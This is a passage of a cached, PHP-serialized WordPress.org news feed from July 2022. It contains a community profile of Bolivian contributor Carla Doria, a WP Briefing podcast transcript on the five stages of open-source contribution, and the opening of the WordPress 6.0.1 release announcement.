https://i1.wp.com/wordpress.org/news/files/2022/07/carla-doria-2.jpg?resize=200%2C300&amp;ssl=1 200w\" sizes=\"(max-width: 600px) 100vw, 600px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Carla began checking the forums as a hobby. She liked that she was able to help people and learn more while doing so. </p>\n\n\n\n<p>Instead of surfing social media during her work breaks, Carla focused on checking the WordPress forums. Through this she learnt about a support job in one of the global firms.</p>\n\n\n\n<p>She felt the job was made for her and was excited to support people in building their websites with WordPress. The role offered the possibility to work remotely and travel while still working.</p>\n\n\n\n<p>After three years as a technical writer, her career felt stuck. She was certain she did not want to return to any job related to industrial engineering. </p>\n\n\n\n<p>Carla did not get through the selection process the first time. But after nearly 18 months between three applications and learning HTML and CSS, Carla finally secured a support job in 2016. With this job, WordPress became her main source of income.</p>\n\n\n\n<h2><strong>Leading a local WordPress community</strong></h2>\n\n\n\n<p>On the job, Carla learned about the WordPress communities around the world and WordCamps. But when somebody asked about the WordPress community where Carla lived, she didn’t know what to say. Was there a community?</p>\n\n\n\n<p>She discovered no local group existed, so she researched what was needed to setup a meetup. Carla discussed the idea with others, but hesitated as she thought it would require an expert WordPress developer to organize.&nbsp;&nbsp;</p>\n\n\n\n<p>But after trying to gauge interest, Carla realized that the only way to find community members was to start a community. In 2017, the <a href=\"https://www.meetup.com/Cochabamba-WordPress-Meetup/\">WordPress community in Cochabamba</a> was born.</p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"684\" height=\"391\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/07/Comunidad_WP_Cochabamba_FSE_event2022.jpg?resize=684%2C391&#038;ssl=1\" alt=\"The theme preview screen in the WordPress Cochabamba meeting on creating your website with blocks.\" class=\"wp-image-13236\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/07/Comunidad_WP_Cochabamba_FSE_event2022.jpg?w=684&amp;ssl=1 684w, https://i0.wp.com/wordpress.org/news/files/2022/07/Comunidad_WP_Cochabamba_FSE_event2022.jpg?resize=300%2C171&amp;ssl=1 300w\" sizes=\"(max-width: 684px) 100vw, 684px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\"><em>WordPress meeting in Cochabamba explored creating your website with blocks</em></figcaption></figure>\n\n\n\n<p>The group has had ups and downs, probably similar to any other community. Although Cochabamba is not a big city, they had issues finding a location that was free and available to anyone who wanted to join. People came with different levels of knowledge, from people with&nbsp;vast experience with WordPress to people with no experience but who wanted to learn.&nbsp;</p>\n\n\n\n<p>The community grew during the pandemic, as meetups went online and people from other cities in Bolivia were able to attend. After restrictions were lifted, there was a lot of excitement amongst members to meet each other in person.</p>\n\n\n\n<h2><strong>Giving back through speaking</strong></h2>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"600\" height=\"900\" src=\"https://i1.wp.com/wordpress.org/news/files/2022/07/carla-doria-1.jpg?resize=600%2C900&#038;ssl=1\" alt=\"Carla reading a book under a tree\" class=\"wp-image-13191\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2022/07/carla-doria-1.jpg?w=600&amp;ssl=1 600w, https://i1.wp.com/wordpress.org/news/files/2022/07/carla-doria-1.jpg?resize=200%2C300&amp;ssl=1 200w\" sizes=\"(max-width: 600px) 100vw, 600px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>The community also helped Carla to develop a new skill in public speaking. She applied to be a speaker at WordCamp Mexico <a href=\"https://mexicocity.wordcamp.org/2019/\">2019</a> and <a href=\"https://mexicocity.wordcamp.org/2020/\">2020</a>, <a href=\"https://guayaquil.wordcamp.org/2019/\">WordCamp Guayaquil 2019</a>, and <a href=\"https://colombia.wordcamp.org/2020/\">WordCamp Colombia in 2020</a>. Her confidence grew while she enjoyed connecting with other communities and meeting people who were on similar pathways. Not all of them were developers, as she had presumed. Many, like her, started out as bloggers.</p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"977\" height=\"419\" src=\"https://i1.wp.com/wordpress.org/news/files/2022/07/WCC.png?resize=977%2C419&#038;ssl=1\" alt=\"WordCamp Cochabamba\'s logo with blue and grey lettering and a hat\" class=\"wp-image-13228\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2022/07/WCC.png?w=977&amp;ssl=1 977w, https://i1.wp.com/wordpress.org/news/files/2022/07/WCC.png?resize=300%2C129&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2022/07/WCC.png?resize=768%2C329&amp;ssl=1 768w\" sizes=\"(max-width: 977px) 100vw, 977px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Finally, after three years, Carla applied to organize her first WordCamp in 2021 in <a href=\"https://cochabamba.wordcamp.org/2021/\">Cochabamba</a>. She had never imagined organizing any WordCamp, and through this having the experience to talk to sponsors and contact companies, and lead a group of people with different talents and backgrounds. Carla felt she had learnt so much from the experience.</p>\n\n\n\n<p>Thanks to WordPress, Carla found a job she enjoyed, was able to work remotely, and help build something in her community to help people learn skills and find career opportunities.</p>\n\n\n\n<p>Carla feels grateful for all she has been able to do thanks to WordPress. She said: “WordPress has led me to find good jobs. It also has allowed me to contribute to a community of friends that love learning about WordPress.”  </p>\n\n\n\n<h2>Share the stories</h2>\n\n\n\n<p>Help share these stories of open source contributors and continue to grow the community. Meet more WordPressers in the <a href=\"https://wordpress.org/news/category/newsletter/interviews/\">People of WordPress series</a>.</p>\n\n\n\n<h2>Contributors</h2>\n\n\n\n<p>Thanks to Alison Rothwell (<a href=\'https://profiles.wordpress.org/wpfiddlybits/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>wpfiddlybits</a>), Abha Thakor (<a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>), Larissa Murillo (<a href=\'https://profiles.wordpress.org/lmurillom/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>lmurillom</a>), Meher Bala (<a href=\'https://profiles.wordpress.org/meher/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>meher</a>), Chloe Bringmann (<a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a>), and Surendra Thakor (<a href=\'https://profiles.wordpress.org/sthakor/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>sthakor</a>) for work on this feature, and to all the contributors who helped with the series recently. Thank you too to Carla Doria (<a href=\'https://profiles.wordpress.org/carlisdm/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>carlisdm</a>) for sharing her experiences.</p>\n\n\n\n<p>Thank you to Josepha Haden (@chantaboune) and Topher DeRosia (<a href=\'https://profiles.wordpress.org/topher1kenobe/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>topher1kenobe</a>) for their support of the People of WordPress series.</p>\n\n\n\n<div class=\"wp-block-media-text is-stacked-on-mobile is-vertically-aligned-center\" style=\"grid-template-columns:29% auto\"><figure class=\"wp-block-media-text__media\"><img decoding=\"async\" loading=\"lazy\" width=\"180\" height=\"135\" src=\"https://i1.wp.com/wordpress.org/news/files/2020/03/heropress_logo_180.png?resize=180%2C135&#038;ssl=1\" alt=\"HeroPress logo\" class=\"wp-image-8409 size-full\" data-recalc-dims=\"1\" /></figure><div class=\"wp-block-media-text__content\">\n<p class=\"has-small-font-size\"><em>This People of WordPress feature is inspired by an essay originally published on </em><a href=\"https://heropress.com/\"><em>HeroPress.com</em></a><em>, a community initiative created by Topher DeRosia. It highlights people in the WordPress community who have overcome barriers and whose stories might otherwise go unheard. </em>#HeroPress </p>\n</div></div>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13201\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WP Briefing: Episode 36: Beginner’s Guide to Contributions 2.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://wordpress.org/news/2022/07/episode-36-beginners-guide-to-contributions-2-0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 25 Jul 2022 11:05:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13162\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:164:\"Thinking of contributing to WordPress? Josepha Haden Chomphosy guides you through the five stages of contribution on the latest episode of the WP Briefing podcast! \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2022/07/WP-Briefing-036.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:16474:\"\n<p>In the thirty-sixth episode of the WordPress Briefing, Josepha Haden Chomphosy revisits the Beginner&#8217;s Guide to Contributions to the WordPress open source project. </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a><br>Song: Fearless First by Kevin MacLeod</p>\n\n\n\n<h2>References</h2>\n\n\n\n<ol><li><a href=\"https://make.wordpress.org/performance\" data-type=\"URL\" data-id=\"make.wordpress.org/performance\">Performance Team Information</a></li><li><a href=\"https://make.wordpress.org/community/2022/07/07/wcus2022-contributor-team-signup/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/community/2022/07/07/wcus2022-contributor-team-signup/\">WordCamp US Contributor Day Table Lead Info</a></li><li><a href=\"https://make.wordpress.org/test/2022/07/11/fse-program-testing-call-15-category-customization/\">Call for Testing #15: Category Customization </a></li><li><a href=\"https://europe.wordcamp.org/2019/contributor-orientation-tool/\">Contributor Quizlet</a></li></ol>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13162\"></span>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:10]&nbsp;&nbsp;</p>\n\n\n\n<p>Hello everyone, and welcome to the WordPress Briefing. The podcast where you can catch quick explanations of some of the ideas behind the WordPress open source project and the community around it, as well as get a small list of big things coming up in the next two weeks. I&#8217;m your host Josepha Haden Chomphosy.</p>\n\n\n\n<p>Here we go.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:40]&nbsp;&nbsp;</p>\n\n\n\n<p>WordPress is an open source software project and, like many other open source software projects, has an entire community of people who show up to help improve it however they can. Most of you probably use WordPress every day in some way. And I&#8217;m going to assume that since you listen to this podcast, you&#8217;re also interested in how this all works.</p>\n\n\n\n<p>One of the things I mention practically every episode is that WordPress works and continues to work because of generous contributions from people all around the world. I consider my work with WordPress to be my way of giving back for everything that this software enabled me and my family to do. But I once was a first-time contributor, and I remember what it felt like before I knew everything.&nbsp;</p>\n\n\n\n<p>I felt like it moved at the speed of light and that I could never tell what to do now, let alone what to do next. And that everyone around me basically already knew everything. And if you are feeling that way right now, I encourage you to take a big deep breath [breathe] and let me help you get started.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:01:43]&nbsp;&nbsp;</p>\n\n\n\n<p>I&#8217;m a roadmap sort of person. So I&#8217;m going to start by sharing the stages I&#8217;ve observed for folks who are contributing to open source. That way, you can tell where you are right now, which spoiler alert is probably a bit further along than you realize. Then I&#8217;ll give you some questions you can ask yourself for each stage to figure out what is a good fit for you. Think of it as a guided exploration.&nbsp;</p>\n\n\n\n<p>All right, the five stages. So these are they:&nbsp;</p>\n\n\n\n<ol><li><strong>Connecting</strong>. That&#8217;s when you&#8217;re first learning about the community. You know WordPress exists, but now you&#8217;ve just discovered that the community exists. That&#8217;s where you are.&nbsp;</li><li>The second phase is <strong>Understanding</strong>. It&#8217;s when you are researching the community, like, you know it exists, you think you want to give back, and so you&#8217;re trying to figure out where everything is.&nbsp;</li><li>The third phase is what I call <strong>Engaging</strong>. It&#8217;s when you&#8217;re first interacting, you&#8217;ve downloaded the CMS, you have figured out which team you think you&#8217;re interested in, and you&#8217;re headed to events or meetings or whatever.&nbsp;</li><li>The fourth stage is one that I refer to as <strong>Performing</strong>. And that&#8217;s when you&#8217;ve decided that you&#8217;re gonna volunteer and you&#8217;re gonna take some action. You&#8217;re going to like a contributor day or running a release or whatever. I think that&#8217;s probably not the first place you land, running a release is probably a lot, but, you know, coordinating work on the release or something like that.&nbsp;</li><li>And then phase five, which is the <strong>Leading</strong> phase. That&#8217;s when you&#8217;re taking responsibility for things getting done.&nbsp;</li></ol>\n\n\n\n<p>[Josepha Haden Chomphosy 00:03:08]&nbsp;&nbsp;</p>\n\n\n\n<p>Before we get any further, there are four important things to remember about those stages.</p>\n\n\n\n<p>The first thing to remember is that there is no set time between any of those stages. You can start in one and then three years later go to the next one, or you can start in one and go into the next stage tomorrow. The next thing to know is that each stage builds on the one before it. In my observation, anytime I have seen a contributor who feels like they&#8217;re really struggling, it&#8217;s because they skipped a stage in there, which really causes some trouble for them.</p>\n\n\n\n<p>The next thing to remember is that not everyone will make it through these stages, which is okay. The majority of the community stops at three. Most contributors stop at four. And that is perfectly fine. That is expected. That is normal and completely in line with what we expect from contribution.</p>\n\n\n\n<p>Uh, and the final thing to remember about that list of the phases is that very few people make it into that leadership stage. If we assume, like I do, that 1% of the people who are using WordPress also show up and contribute back to WordPress, then it&#8217;s kind of safe to assume also that about 1% of those people who have shown up to contribute to WordPress are moving into a space where they feel like they&#8217;re willing to take responsibility for making sure things get done in WordPress.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:04:31]&nbsp;&nbsp;</p>\n\n\n\n<p>Like we all collectively feel responsible for WordPress&#8217;s success, but in that leadership area, you&#8217;re kind of taking responsibility for 40% of the web or whatever&#8217;s going on there. And not a lot of people make it there, and that is completely fine, too. So that&#8217;s our basic terminology today. Those are the caveats that go with our basic terminology.</p>\n\n\n\n<p>Most difficulties that arise for new contributors happen because a stage got skipped somewhere along the way. It&#8217;s almost never intentional, but from what I&#8217;ve observed, that&#8217;s what makes it really difficult to get started and what makes it difficult to keep going once you&#8217;ve kind of already gotten in there.</p>\n\n\n\n<p>So, all right. Big breath, folks with me again [breathe]. Alright, it&#8217;s guided exploration time.&nbsp;</p>\n\n\n\n<p>First phase, the connecting phase. Remember, this is where you&#8217;ve just learned the community exists, people are talking about it, you don&#8217;t know much more. The first step for you is asking yourself what it is you could do. Or if there&#8217;s a project out there that looks particularly interesting.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:05:36]&nbsp;&nbsp;</p>\n\n\n\n<p>So you can ask yourself questions, like, am I a writer? And if I am a writer, do I write technical or prose. The other thing you can ask is, am I a PHP developer, a JavaScript developer, Python, Go; which language am I writing in because I find it most beautiful. Another thing you can ask yourself is, am I a teacher or a mentor, or do I just generally like to be a mighty helper? And I like to make sure that things keep running.&nbsp;</p>\n\n\n\n<p>So once you&#8217;ve asked yourself those things, it&#8217;s on to phase two, the understanding phase. This is when you&#8217;re looking around at this new-to-you community to see what is happening where. So you take a look at the teams that are around, you think about whatever it was you said you were good at in the last question and you look at which teams might be a good fit.&nbsp;</p>\n\n\n\n<p>So if you said that you&#8217;re a good technical writer, then Docs probably is for you. Have you been training others to use WordPress for years? Then you might wanna look into Training. There are a lot of other things, obviously, like if you think you&#8217;re good at working with code PHP or JavaScript, you&#8217;re probably gonna end up in Core.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:06:46]&nbsp;&nbsp;</p>\n\n\n\n<p>If you are particularly good at any of the other tech stacks that we have around in our Trac area or an Openverse, then that&#8217;s where you&#8217;ll land over there. You have design options. Like if design is really your thing, we have a Design team, but we also have a Themes team. There are plenty of places that you can land depending on what it is that you feel like you are the best at and could really help the WordPress project. And so that&#8217;s your phase two.&nbsp;</p>\n\n\n\n<p>Now that you have gotten a good guess at a team, we&#8217;re gonna swing through to phase three, which is the engaging phase. This is the phase that is the scariest for most people, but it&#8217;s okay. I am here for you. I am here for you in this podcast. So you have figured out what you want to do in order to contribute, and you&#8217;ve got a sense for the team that looks right. There are two things that you do next.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:07:34]&nbsp;&nbsp;</p>\n\n\n\n<p>One is that you can go to a meeting. There are many kinds of meetings. There are team meetings, bug scrubs, and testing sessions, but they&#8217;re all in Slack, which means that you can attend one from anywhere. When they kick off, you wave, you introduce yourself, you let everybody know that you&#8217;re there and you&#8217;re observing. Folks will welcome you and just kind of give you some concept of what they&#8217;re working on. Easy as that. You&#8217;ve done your first time meeting attendance.&nbsp;</p>\n\n\n\n<p>Another good option is to keep an eye out for specific events. Some of those events happen online, like Global Translation Day. But also some of them happen in person like, Meetups or WordCamps. And there again, you show up, you wave, you introduce yourself, see if you can make a connection or two, let people know that you&#8217;re new and you&#8217;re just trying to figure out where you are and what you wanna do.&nbsp;</p>\n\n\n\n<p>If you&#8217;ve made it now, all the way to phase four, the performing phase, then give yourself a little pat on the back! Figuring out where you want to go and who your friendly faces are is the biggest challenge when you get started. So congratulations!&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:08:37]&nbsp;&nbsp;</p>\n\n\n\n<p>Phase four is the phase where you&#8217;ve decided you&#8217;re brave enough to volunteer &#8211; to do some contribution. You&#8217;re volunteering your time. That&#8217;s where you are now. So oddly enough, you start this phase by assigning yourself something, assigning yourself, a task. This seems counterintuitive.</p>\n\n\n\n<p>There&#8217;s this feeling that you can&#8217;t say that you&#8217;re gonna do something. That you can&#8217;t just assign something to yourself and say that you&#8217;re gonna do it. But in open source projects, you always can. You find a task where you&#8217;re comfortable, and you just mention that you would like to give it a try while the team is having their weekly meeting. And it&#8217;s simple as that. And not big things either. Like organizing an event or maintaining a component, those are probably too big for your first time around.</p>\n\n\n\n<p>I&#8217;m talking things like, &#8216;I will test that patch that you mentioned in the meeting.&#8217; Or &#8216;I will review the docs and make sure that they&#8217;re up to date with the most recent release.&#8217; Or &#8216;I can help run meetings for the next release.&#8217;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:09:40]&nbsp;&nbsp;</p>\n\n\n\n<p>And then you have phase five, where you just repeat phase four until you are leading something! And I don&#8217;t mean leading in the 1950s sort of way, where you have like a corner office and you&#8217;re ordering people around. I mean, in the warm, inviting millennial way where you&#8217;re leading by inspiring people to do something or you&#8217;re leading because you make sure that the meeting happens every single week.</p>\n\n\n\n<p>Or you&#8217;re leading because you added screenshots to tickets that needed testing and so you moved something forward in a way that was helpful. Easy peasy. You can go to your first contributor today or a WordPress Slack meeting and just be a contributor by the time you leave, right? You might feel like ‘easy as that isn&#8217;t quite the right set of words right there. And as a matter of fact, you might be thinking to yourself, this woman is just plain wrong. It could not possibly be that easy. And I agree. It really isn&#8217;t literally quote-unquote just that easy. Just like handing someone a notebook and a pen will not instantly make them an award-winning novelist, handing someone a wordpress.org profile and credentials to Slack won&#8217;t instantly make them a contributor.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:10:46]&nbsp;&nbsp;</p>\n\n\n\n<p>For both of those examples, what makes someone good is the ability to try and fail and still be encouraged to try again. So if it&#8217;s been a while since you contributed and you&#8217;re thinking about returning, or if you&#8217;ve been listening to me for a while and you&#8217;re ready to give this contribution thing a try, I hope this helps you to feel brave enough to try and brave enough to fail.</p>\n\n\n\n<p>And I encourage you to be brave enough to try again.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:11:20]&nbsp;&nbsp;</p>\n\n\n\n<p>Let&#8217;s take a look at our small list of big things. My friends, we have a Performance team. This team has been a working group for a long time and is focused on some deep, inner workings of WordPress and its surrounding ecosystem to make sure that we are as fast and slick as possible. You can check them out on make.wordpress.org/performance, their brand new site, and see when they&#8217;re meeting, what they&#8217;re aiming to get into the WordPress 6.1 release, and if that&#8217;s something that you would like to contribute to.&nbsp;</p>\n\n\n\n<p>The second thing is that there&#8217;s a brand new call out for testing. This time it&#8217;s focused on templates and retroactively applying them to an entire category of posts. So it&#8217;s a little bit workflow testing, a little bit technology testing, and we could really use your help in bug hunting for both of those things.</p>\n\n\n\n<p>And the final thing is that you know since contribution is obviously the focus of today&#8217;s podcast, we are looking for table leads for WordCamp US’ contributor day that&#8217;s coming up in September. There&#8217;s a whole blog post about it, I&#8217;ll link to it in the show notes so that you&#8217;ll have all the info and can raise your hand if you want.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:12:25]&nbsp;&nbsp;</p>\n\n\n\n<p>And speaking of things that I&#8217;ll have in the show notes, I also am going to put like a contributor quizlet guide thing. If the guided, figuring out of the teams in the phase two section, if that didn&#8217;t make any sense to you and you just need something to direct you specifically to potential teams, I&#8217;m gonna link to the contributor kind of sorting hat quiz that came out with WordCamp Europe. And that should help you work your way through phase two and get ready for phase three if that is where the spirit takes you.&nbsp;</p>\n\n\n\n<p>And that, my friends, is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy. And I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13162\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"WordPress 6.0.1 Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2022/07/wordpress-6-0-1-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 12 Jul 2022 16:58:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"6.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:5:\"6.0.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:14:\"minor-releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13138\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:236:\"WordPress 6.0.1 is now available for download. This maintenance release features several updates since the release of WordPress 6.0 in May 2022. You can review a summary of the key changes in this release by visiting WordPress.org/news.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Dan Soschin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5452:\"\n<h2>WordPress 6.0.1 is now available</h2>\n\n\n\n<p>This maintenance release features <a href=\"https://core.trac.wordpress.org/query?milestone=6.0.1\">13 bug fixes in Core</a> and <a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.0\">18 bug fixes</a> for the Block Editor. WordPress 6.0.1 is a short-cycle maintenance release. You can review a summary of the key updates in this release by reading the <a href=\"https://make.wordpress.org/core/2022/07/05/wordpress-6-0-1-rc-1-is-now-available/\">RC1 announcement</a>.</p>\n\n\n\n<p>The next major release will be <a href=\"https://make.wordpress.org/core/2022/06/23/wordpress-6-1-planning-roundup/\">version 6.1</a> planned for later in 2022.</p>\n\n\n\n<p>If you have sites that support automatic background updates, the update process will begin automatically.</p>\n\n\n\n<p>You can <a href=\"https://wordpress.org/wordpress-6.0.1.zip\">download WordPress 6.0.1 from WordPress.org</a>, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”.</p>\n\n\n\n<p>For more information, check out the <a href=\"https://wordpress.org/support/wordpress-version/version-6-0-1/\">version 6.0.1 HelpHub documentation page</a>.</p>\n\n\n\n<h2>Thank you to these WordPress contributors</h2>\n\n\n\n<p>The WordPress 6.0.1 release is led by <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">@sergeybiryukov</a> and <a href=\"https://profiles.wordpress.org/zieladam/\">@zieladam</a>.</p>\n\n\n\n<p>WordPress 6.0.1 would not have been possible without the contributions of more than 50 people. Their asynchronous coordination to deliver several enhancements and fixes into a stable release is a testament to the power and capability of the WordPress community.</p>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/zieladam/\">Adam Zielinski</a>, <a href=\"https://profiles.wordpress.org/addiestavlo/\">Addie</a>, <a 